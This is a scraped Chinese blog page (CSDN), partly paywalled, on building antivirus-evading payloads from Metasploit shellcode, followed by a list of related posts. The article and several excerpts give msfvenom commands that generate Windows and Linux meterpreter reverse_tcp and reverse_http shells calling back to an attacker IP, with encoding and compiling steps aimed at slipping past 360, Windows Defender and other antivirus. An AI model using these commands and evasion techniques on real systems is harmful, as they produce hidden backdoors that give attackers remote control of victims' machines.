使用MSF生成的shellcode打造免杀payload

最新推荐文章于 2024-09-02 20:37:59 发布
最新推荐文章于 2024-09-02 20:37:59 发布
阅读量1.3w 收藏 25
点赞数 4
分类专栏: shellcode 文章标签: shellcode msf 免杀 payload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mickeymouse1928/article/details/71160027
版权
本文介绍了如何在Kali攻击机上使用msfvenom生成shellcode,然后在Windows 7环境中通过Visual Studio创建Win32控制台项目,将shellcode嵌入并设置项目属性以避免DLL错误,最终编译生成免杀的exe文件。同时,还展示了在Kali上配置msf multi/handler模块进行监听,以便在目标主机执行后能成功回连。
摘要由CSDN通过智能技术生成

环境

1.Kali攻击机IP:192.168.114.140

2.使用win7生成exe

步骤:

使用msfvenom生成shellcode :

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c

win7中使用Visual studio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):

选择空项目

最低0.47元/天 解锁文章
MickeyMouse1928
关注
专栏目录
Kali学习笔记使用msf生成shellcode制作免杀payload
Kind&红衣的博客
08-13 6625
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
使用shellcode打造MSF免杀payload
Coisini的博客
06-21 1946
0x00 前言 经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。 0x01 从哪里开始 shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它...
msfvenom常用脚本生成
03-19 359
1、 Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe 2、Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> ...
木马免杀处理
最新发布
weixin_58666006的博客
09-02 1178
木马免杀,脚本型木马和二进制型木马
生成msf常用payload
hl1293348082的专栏
04-07 2655
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 正在上传…重新上传取消 生成二进制文件 关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。 Windows ms
免杀后门之MSF&Veil-Evasion的完美结合
weixin_33749242的博客
10-14 724
  本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payloadkali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载: git clone https://www.github.com/Veil-Framework/Ve...
Metasploit (MSF) 使用-包含基本使用payload生成、后渗透模块使用
dzqxwzoe的博客
02-29 1609
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1011
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msf生成linux shellcode,MSF-Shellcode生成使用
weixin_33344952的博客
05-13 607
1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用payload(攻擊荷載)。如果需要使用自定義的payload,請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...
Metasploit (MSF) 使用:包含基本使用payload生成、后渗透模块使用
Alone hackers的博客
03-06 5034
Metasploit (MSF) 使用:包含基本使用payload生成,后渗透模块使用
使用shellcode打造MSF免杀payloadshellcode加载技术
jackey3Lin的专栏
10-21 5512
0x00 前言      经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode生成功能,接下来我们就拿最常用的payload:reverse
使用MSF生成shellcode
weixin_34092455的博客
04-02 1084
使用MSF生成shellcode payloadshellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1240
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
(记录向)C格式shellcode异或加密生成dll,可免杀过 Windows Defender
daxi0ng的博客
01-13 1715
1、cs生成payload.c 2、使用https://github.com/k-fire/shellcode-To-DLL 测试用(https://github.com/k-fire/shellcode-To-DLL/blob/master/Release/call_dll.exe) 3、按照工具的操作方法生成dll文件。 4、将dll文件转化为exe。 先保存为bat,然后在转换为exe。 ...
c语言msf,Metasploit应用笔记-msfvenom生成meterpreter后门代码
weixin_34564735的博客
05-21 796
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。...
免杀入门---shellcode免杀
LvHLong的博客
05-03 5683
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
红队武器库--在线Shellcode免杀平台(2020年老文)
J0o1ey Blog
10-04 2958
和几位dalao忙了几天 利用PHP+Python+GO三门语言写了一个在线shellcode免杀平台 在CS中生成X64的c shellcode,按照平台指定格式提交,即可一键生成免杀exe后门(过所有国产) 本人郑重承诺,不含任何后门!因为代码写的太烂,就不开源出来了 我也不会收集大佬们的c2 ip,今年hw我并不参加 本在线平台仅限攻防演练、授权渗透测试中使用,严禁用于非法用途(居心叵测之人自重,本系统带有溯源机制) 使用注册码进行账号注册后,会自动获取最近两次登录的ip并进行绑定,其他ip无法登
shellcode免杀丨C语言三条指令免杀360!你还困吗?
HUYA69的博客
09-07 1842
shellcode免杀(1)C语言三条指令免杀360 ✉1 简介 描述有错的地方各位师傅海涵。 经过一下午的C语言测试,得出了十多种过360的·方法,这里拿三种c的方式过360(思路大体相同),还有一个c++的免杀360和火绒都可以过等有时间都可以跟大家更新。 ✉2 免杀过程 废话就不多讲了对于初学者友好发展,先看一遍制作过程,我们准备好msf和cs的shllecode msfvenom -p windows/meterpreter/reverse_tcp LHOST="自...
shellcode之360安全卫士免杀(shecodject)(一)
ZPFCD的博客
07-16 908
shellcode免杀
shellcode不是一段16进制的机器码吗?你为啥说能直接执行呢?应该是需要先编译成二进制可执行文件吧?msf生成shellcode为什么要区分输出格式?掩日免杀是c格式的shellcode生成器吗?如果换了一个格式的shellcode,掩日免杀还能正常工作吗?
04-29
你说得没错,shellcode是一段16进制的机器码,需要先编译成可执行文件才能运行。但是在实际的攻击中,攻击者通常会将shellcode注入到漏洞处,然后通过控制程序流程将其直接执行,而不需要将其编译成可执行文件。 msf生成shellcode区分输出格式,是因为不同的载荷需要不同的格式来生成shellcode。例如,如果是用于缓冲区溢出的payload,通常需要生成C语言格式的shellcode,而如果是用于注入到远程进程中的payload,通常需要生成raw格式的shellcode。 掩日免杀是一个c格式的shellcode生成器,可以生成多种不同格式的shellcode。如果换了一个格式的shellcode,掩日免杀可能无法正常工作,需要进行相应的修改。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值